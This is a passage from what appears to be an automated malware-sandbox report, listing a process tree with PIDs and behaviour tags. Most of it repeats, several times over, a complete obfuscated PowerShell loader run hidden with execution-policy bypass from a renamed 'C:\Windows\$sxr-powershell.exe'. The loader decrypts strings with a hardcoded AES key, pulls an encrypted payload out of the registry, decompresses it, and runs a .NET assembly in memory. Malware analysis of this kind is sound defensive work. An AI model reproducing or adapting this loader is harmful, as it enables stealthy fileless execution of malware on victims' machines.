[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        25⤵
        
        PID:7900
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8924).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        25⤵
        
        PID:6632
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8924" "3112" "3024" "3116" "0" "0" "3120" "0" "0" "0" "0" "0"
        25⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4908
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "9124" "3140" "3044" "3144" "0" "0" "3148" "0" "0" "0" "0" "0"
        24⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5748
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6016).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        23⤵
        
        PID:3296
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6016).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join 